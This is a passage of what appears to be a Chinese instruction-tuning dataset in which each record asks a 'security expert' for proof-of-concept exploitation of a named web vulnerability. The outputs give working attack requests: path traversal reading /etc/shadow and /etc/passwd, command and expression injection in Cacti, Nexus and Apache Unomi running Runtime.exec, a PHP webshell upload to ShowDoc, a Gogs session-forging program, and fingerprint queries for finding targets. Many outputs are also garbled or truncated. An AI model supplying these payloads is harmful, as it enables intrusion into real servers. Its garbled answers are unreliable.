  744. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHPStudy 后台管理页面 one click RCE\n漏洞描述:phpStudy 集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。支持一键 LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx 反向代理、服务器防火墙、Web 防火墙、监控大屏等服务器管理功能。phpStudy 面板存在存储型 XSS 漏洞,攻击者可以通过 js 调用面板中的计划任务执行系统命令。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 小皮 windows 面板 V0.102 以及以下版本\n小皮 linux 面板 X1.29 以及以下版本\n2. x-requested-with: XMLHttpRequest\n3. import hashlib\nstr = \"123456\"\nfor i in range(0,5):\n    str = hashlib.md5(str.encode()).hexdigest()\nprint(str)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/PHPStudy 后台管理页面 one click RCE.md"}
    745. 

  745. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShopXO 任意文件读取漏洞CNVD-2021-15822\n漏洞描述:ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 参考链接: - https://www.cnvd.org.cn/flaw/show/CNVD-2021-15822\n网络测绘:``` app=\"ShopXO企业级B2C电商系统提供商\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"ShopXO企业级B2C电商系统提供商\"\n2. GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n3. - https://www.cnvd.org.cn/flaw/show/CNVD-2021-15822\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ShopXO 任意文件读取漏洞 CNVD-2021-15822.md"}
    746. 

  746. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336\n漏洞描述:金笛 短信中间件Web版后台存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件信息\n影响版本:``` 金笛 短信中间件Web版 ```\n网络测绘:``` app=\"金笛短信中间件(WEB版)\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 金笛 短信中间件Web版\n2. app=\"金笛短信中间件(WEB版)\"\n3. /log?action=view&pageIndex=1&name=../../../windows/win.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md"}
    747. 

  747. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cacti 前台命令注入漏洞 CVE-2022-46169\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-46169\n【POC利用方法】\n1. docker-compose up -d\n2. GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1\nX-Forwarded-For: 127.0.0.1\nHost: localhost.lan\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Length: 2\n3. GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`echo+'<?php+phpinfo();?>'>/var/www/html/test.php` HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md"}
    748. 

  748. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS exportUser.php 远程命令执行\n漏洞描述:TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞\n影响版本:``` TerraMaster TOS < 4.1.24 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. TerraMaster TOS < 4.1.24\n2. \"TerraMaster\" && header=\"TOS\"\n3. <?php\n    include_once \"./app.php\"; // [1] autoload classes\n    class CSV_Writer{\n        ...\n    }\n    $type = $_GET['type'];\n    $csv = new CSV_Writer();\n    if($type == 1){\n        $P = new person();\n        $data = $P->export_user($_GET['data']);\n        $csv->exportUser($data);\n    } else if($type == 2) {\n        $P = new person();\n        $data = $P->export_userGroup($_GET['data']);\n        $csv->exportUsergroup($data);\n    } else { // [2] type value is bigger than 2\n        //xlsx通用下载\n        $type = 0;\n        $class = $_GET['cla'];\n        $fun = $_GET['func'];\n        $opt = $_GET['opt'];\n        $E = new $class();\n        $data = $E->$fun($opt); // [3] vulnerable code call\n        $csv->exportExcel( $data['title'], $data['data'], $data['name'], $data['save'], $data['down']);\n    }\n?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS exportUser.php 远程命令执行.md"}
    749. 

  749. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐起云 resetPwd 登陆绕过漏洞\n漏洞描述:锐起云是一款企业私有云,旨在帮助企业建立私有云存储和管理系统,帮助企业实现集中管理文档、强化数据安全、打造信息互通、数据驱动的协同办公环境。提升工作效率的同时,使数据真正为企业掌控,全程不改变用户操作习惯,是全新一代企业云盘的代表。锐起云存在前台未授权修改密码登陆后台漏洞,攻击者可以通过访问特定接口重置管理员密码。\n影响版本:锐起云 v3.6\n网络测绘:``` \"锐起云\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. /dwr/role/resetPwd\n2. poc,将密码重置为111111\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/锐起云 resetPwd 登陆绕过漏洞.md"}
    750. 

  750. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞\n漏洞描述:深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件\n影响版本:深信服 SG上网优化管理系统\n网络测绘:``` title==\"SANGFOR上网优化管理\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title==\"SANGFOR上网优化管理\"\n2. POST /php/catjs.php\n\n[\"../../../../../../etc/shadow\"]\n3. [\"../../../../../../etc/shadow\"]\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞.md"}
    751. 

  751. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524\n漏洞描述:Apache Superset 是一款现代化的开源大数据工具,也是企业级商业智能 Web 应用,用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器,用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中,未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。\n影响版本:``` Apache Superse <= 2.0.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-27524\n【POC利用方法】\n1. Apache Superse <= 2.0.1\n2. app.name=\"Apache Superset\"\n3. https://github.com/apache/superset/pull/23186/files\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md"}
    752. 

  752. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204\n漏洞描述:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。\n影响版本:``` Nexus < 3.21.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-10204\n【POC利用方法】\n1. Nexus < 3.21.1\n2. POST /service/extdirect HTTP/1.1\nHost: \naccept: application/json\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\nNX-ANTI-CSRF-TOKEN: 0.856555763510765\nContent-Type: application/json\nCookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=e9d6620d-6843-49a6-a887-cd7cef74d413\nContent-Length: 304\n\n\n{\"action\":\"coreui_Role\",\"method\":\"create\",\"data\":[{\"version\":\"\",\"source\":\"default\",\"id\":\"1111\",\"name\":\"2222\",\"description\":\"3333\",\"privileges\":[\"$\\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('cp /etc/passwd ./public/vuln.html')}\"],\"roles\":[]}],\"type\":\"rpc\",\"tid\":89}\n3. POST /service/extdirect HTTP/1.1\nHost: \naccept: application/json\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\nNX-ANTI-CSRF-TOKEN: 0.856555763510765\nContent-Type: application/json\nCookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=e9d6620d-6843-49a6-a887-cd7cef74d413\nContent-Length: 304\n\n\n{\"action\":\"coreui_User\",\"method\":\"update\",\"data\":[{\"userId\":\"www\",\"version\":\"2\",\"firstName\":\"www\",\"lastName\":\"www\",\"email\":\"www@qq.com\",\"status\":\"active\",\"roles\":[\"$\\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('cp /etc/passwd ./public/vuln.html')}\"]}],\"type\":\"rpc\",\"tid\":9}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204.md"}
    753. 

  753. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gogs 任意用户登录漏洞 CVE-2018-18925\n漏洞描述:gogs是一款极易搭建的自助Git服务平台,具有易安装、跨平台、轻量级等特点,使用者众多。 其0.11.66及以前版本中,(go-macaron/session库)没有对sessionid进行校验,攻击者利用恶意sessionid即可读取任意文件,通过控制文件内容来控制session内容,进而登录任意账户。 参考链接: - https://github.com/gogs/gogs/issues/5469 - https://xz.aliyun.com/t/3168 - https://www.anquanke.com/post/id/163575\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-18925\n【POC利用方法】\n1. docker-compose up -d\n2. package main\n\nimport (\n    \"bytes\"\n    \"encoding/gob\"\n    \"encoding/hex\"\n    \"fmt\"\n    \"io/ioutil\"\n    \"os\"\n)\n\nfunc EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {\n    for _, v := range obj {\n        gob.Register(v)\n    }\n    buf := bytes.NewBuffer(nil)\n    err := gob.NewEncoder(buf).Encode(obj)\n    return buf.Bytes(), err\n}\n\nfunc main() {\n    var uid int64 = 1\n    obj := map[interface{}]interface{}{\"_old_uid\": \"1\", \"uid\": uid, \"uname\": \"root\"}\n    data, err := EncodeGob(obj)\n    if err != nil {\n        fmt.Println(err)\n    }\n    err = ioutil.WriteFile(\"data\", data, os.O_CREATE|os.O_WRONLY)\n    if err != nil {\n        fmt.Println(err)\n    }\n    edata := hex.EncodeToString(data)\n    fmt.Println(edata)\n}\n3. - https://www.anquanke.com/post/id/163575\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gogs 任意用户登录漏洞 CVE-2018-18925.md"}
    754. 

  754. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Evolucare Ecsimaging new_movie.php 远程命令执行漏洞\n漏洞描述:EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等.\n影响版本:``` EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5 ```\n网络测绘:``` body=\"ECSimaging\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5\n2. body=\"ECSimaging\"\n3. /new_movie.php?studyUID=1&start=2&end=2&file=1;pwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Evolucare Ecsimaging new_movie.php 远程命令执行漏洞.md"}
    755. 

  755. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:向日葵 check 远程命令执行漏洞 CNVD-2022-10270\n漏洞描述:向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取\n影响版本:``` 11.0.0.33162 ```\n网络测绘:``` body=\"Verification failure\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 11.0.0.33162\n2. body=\"Verification failure\"\n3. /cgi-bin/rpc?action=verify-haras\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md"}
    756. 

  756. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞\n漏洞描述:云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 云时空 社会化商业ERP系统 ```\n网络测绘:``` title=\"云时空社会化商业ERP\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 云时空 社会化商业ERP系统\n2. title=\"云时空社会化商业ERP\"\n3. sqlmap -u \"http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin\"\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md"}
    757. 

  757. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:天融信 DLP 未授权访问漏洞\n漏洞描述:天融信DLP存在未授权访问漏洞\n影响版本:``` 天融信DLP ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 默认用户superman的uid=1\nPOST /?module-auth_user&action=mod_edit.pwd HTTP/1.1\n2. 默认用户superman的uid=1\n3. POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/天融信 DLP 未授权访问漏洞.md"}
    758. 

  758. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ImageMagick PDF密码位置命令注入漏洞 CVE-2020-29599\n漏洞描述:ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞,通过构造好的SVG格式图片文件,即可在Imagemagick中注入任意命令。 参考链接: - https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-29599\n【POC利用方法】\n1. docker-compose run im bash\n2. root@f200ec9e1c1e:/# cd /tmp/\nroot@f200ec9e1c1e:/tmp# ls\npoc.svg\nroot@f200ec9e1c1e:/tmp# identify poc.svg\npoc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003\nroot@f200ec9e1c1e:/tmp# convert poc.svg poc.png\nsh: 1: : Permission denied\nconvert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.\nAborted\nroot@f200ec9e1c1e:/tmp# ls\n0wned  poc.svg\nroot@f200ec9e1c1e:/tmp\n3. root@a1b29c85d417:/tmp# strings poc.svg\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ImageMagick PDF密码位置命令注入漏洞 CVE-2020-29599.md"}
    759. 

  759. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GhostScript 沙箱绕过(命令执行)漏洞 CVE-2019-6116\n漏洞描述:2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 参考链接: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2 - https://www.anquanke.com/post/id/170255\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-6116\n【POC利用方法】\n1. docker-compose up -d\n2. 作者给出了[POC](https://github.com/vulhub/vulhub/blob/master/ghostscript/CVE-2019-6116/poc.png),上传这个文件,即可执行`id > /tmp/success`:\n3. - https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GhostScript 沙箱绕过(命令执行)漏洞 CVE-2019-6116.md"}
    760. 

  760. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Unomi 远程表达式代码执行漏洞 CVE-2020-13942\n漏洞描述:Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中,存在一处表达式注入漏洞,远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令。 参考链接: - https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://github.com/eugenebmx/CVE-2020-13942\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-13942\n【POC利用方法】\n1. docker-compose up -d\n2. POST /context.json HTTP/1.1\nHost: your-ip:9443\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 483\n\n{\n    \"filters\": [\n        {\n            \"id\": \"sample\",\n            \"filters\": [\n                {\n                    \"condition\": {\n                         \"parameterValues\": {\n                            \"\": \"script::Runtime r = Runtime.getRuntime(); r.exec(\\\"touch /tmp/mvel\\\");\"\n                        },\n                        \"type\": \"profilePropertyCondition\"\n                    }\n                }\n            ]\n        }\n    ],\n    \"sessionId\": \"sample\"\n}\n3. POST /context.json HTTP/1.1\nHost: your-ip:9443\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 1064\n\n{\n  \"personalizations\":[\n    {\n      \"id\":\"gender-test\",\n      \"strategy\":\"matching-first\",\n      \"strategyOptions\":{\n        \"fallback\":\"var2\"\n      },\n      \"contents\":[\n        {\n          \"filters\":[\n            {\n              \"condition\":{\n                \"parameterValues\":{\n                  \"propertyName\":\"(#runtimeclass = #this.getClass().forName(\\\"java.lang.Runtime\\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\\"getRuntime\\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\\"exec\\\")}.{? #this.getParameters()[0].getType().getName().equals(\\\"java.lang.String\\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\\"touch /tmp/ognl\\\"))\",\n                  \"comparisonOperator\":\"equals\",\n                  \"propertyValue\":\"male\"\n                },\n                \"type\":\"profilePropertyCondition\"\n              }\n            }\n          ]\n        }\n      ]\n    }\n  ],\n  \"sessionId\":\"sample\"\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Unomi 远程表达式代码执行漏洞 CVE-2020-13942.md"}
    761. 

  761. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:E-message 越权访问漏洞\n漏洞描述:E-message 存在越权访问漏洞,由于配置页面没有做权限设定,导致攻击者可以访问并重置账号密码等操作\n影响版本:``` E-message ```\n网络测绘:``` title=\"emessage 设置: 数据库设置 - 标准连接\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"emessage 设置: 数据库设置 - 标准连接\"\n2. http://xxx.xxx.xxx.xxx/setup/setup-datasource-standard.jsp\n3. http://xxx.xxx.xxx.xxx/setup/setup-datasource-standard.jsp\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/E-message 越权访问漏洞.md"}
    762. 

  762. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WSO2 proxy SSRF漏洞 WSO2-2019-0598\n漏洞描述:滥用 shindig Web 应用程序的 UI 小工具加载功能可以利用此漏洞。攻击者可以更改请求中的特定 URL,从而导致服务器向更改后的 URL 发起 GET 请求。通过利用此漏洞,攻击者可以使用服务器执行任意外部服务交互。这可以特别用于与内部网络的节点进行交互,否则这些节点会被网络规则隐藏在外部。攻击者可以利用它来追踪和侦察网络,除此之外,如果有内部端点对 GET 请求进行状态更改操作,那么就有可能很好地破坏它们的完整性。根据端点实施的保护级别,此漏洞的影响可能会有所不同。\n影响版本:``` WSO2 Identity Server 5.2.0 , 5.3.0 , 5.4.0 , 5.4.1 , 5.5.0 , 5.6.0 , 5.7.0 WSO2 IS as Key Manager 5.3.0 , 5.5.0 , 5.6.0 , 5.7.0 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. WSO2 Identity Server 5.2.0 , 5.3.0 , 5.4.0 , 5.4.1 , 5.5.0 , 5.6.0 , 5.7.0\nWSO2 IS as Key Manager 5.3.0 , 5.5.0 , 5.6.0 , 5.7.0\n2. GET /shindig/gadgets/proxy?container=default&url=https://www.baidu.com HTTP/1.1\nHost: localhost:9443\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nContent-Length: 0\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\nSec-Ch-Ua-Mobile: ?0\nSec-Ch-Ua-Platform: \"macOS\"\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: cross-site\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\n3. private void processRequest(HttpServletRequest request, HttpServletResponse servletResponse) throws IOException {\n        if (request.getHeader(\"If-Modified-Since\") != null) {\n            servletResponse.setStatus(304);\n        } else {\n            Uri reqUri = (new UriBuilder(request)).toUri();\n\n            HttpResponse response;\n            try {\n                ProxyUri proxyUri = this.proxyUriManager.process(reqUri);\n                SecurityToken st = AuthInfoUtil.getSecurityTokenFromRequest(request);\n                proxyUri.setSecurityToken(st);\n                proxyUri.setUserAgent(request.getHeader(\"User-Agent\"));\n                if (proxyUri.getGadget() == null && st != null && !st.isAnonymous()) {\n                    proxyUri.setGadget(st.getAppUrl());\n                }\n\n                AuthType authType = proxyUri.getAuthType();\n                if (AuthType.OAUTH.equals(authType)) {\n                    proxyUri.setOAuthArguments(new OAuthArguments(AuthType.OAUTH, request));\n                } else if (AuthType.OAUTH2.equals(authType)) {\n                    proxyUri.setOAuth2Arguments(new OAuth2Arguments(request));\n                }\n\n                String host = request.getHeader(\"Host\");\n                if (!this.lockedDomainService.isSafeForOpenProxy(host)) {\n                    Uri resourceUri = proxyUri.getResource();\n                    String msg = \"Embed request for url \" + (resourceUri != null ? resourceUri.toString() : \"n/a\") + \" made to wrong domain \" + host;\n                    if (LOG.isLoggable(Level.INFO)) {\n                        LOG.logp(Level.INFO, classname, \"processRequest\", \"embededImgWrongDomain\", new Object[]{resourceUri != null ? resourceUri.toString() : \"n/a\", host});\n                    }\n\n                    throw new GadgetException(Code.INVALID_PARAMETER, msg, 400);\n                }\n\n                if (\"POST\".equalsIgnoreCase(request.getMethod())) {\n                    StringBuffer buffer = this.getPOSTContent(request);\n                    response = this.proxyHandler.fetch(proxyUri, buffer.toString());\n                } else {\n                    response = this.proxyHandler.fetch(proxyUri);\n                }\n            } catch (GadgetException var11) {\n                response = ServletUtil.errorResponse(new GadgetException(var11.getCode(), var11.getMessage(), 400));\n            }\n\n            ServletUtil.copyToServletResponseAndOverrideCacheHeaders(response, servletResponse);\n        }\n    }\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/WSO2 proxy SSRF漏洞 WSO2-2019-0598.md"}
    763. 

  763. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShowDoc PageController.class.php 任意文件上传漏洞\n漏洞描述:ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器\n影响版本:``` ShowDoc < V2.8.3 ```\n网络测绘:``` app=\"ShowDoc\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. ShowDoc < V2.8.3\n2. app=\"ShowDoc\"\n3. POST /index.php?s=/home/page/uploadImg HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\nContent-Length: 239\nContent-Type: multipart/form-data; boundary=--------------------------921378126371623762173617\nAccept-Encoding: gzip\n\n----------------------------921378126371623762173617\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"test.<>php\"\nContent-Type: text/plain\n\n<?php phpinfo();?>\n----------------------------921378126371623762173617--\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ShowDoc PageController.class.php 任意文件上传漏洞.md"}
    764. 

  764. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Metabase geojson 任意文件读取漏洞 CVE-2021-41277\n漏洞描述:在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息\n影响版本:``` metabase version < 0.40.5 metabase version >= 1.0.0, < 1.40.5 ```\n网络测绘:``` app=\"metabase\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-41277\n【POC利用方法】\n1. metabase version < 0.40.5\nmetabase version >= 1.0.0, < 1.40.5\n2. app=\"metabase\"\n3. /api/geojson?url=file:/etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Metabase geojson 任意文件读取漏洞 CVE-2021-41277.md"}
    765. 

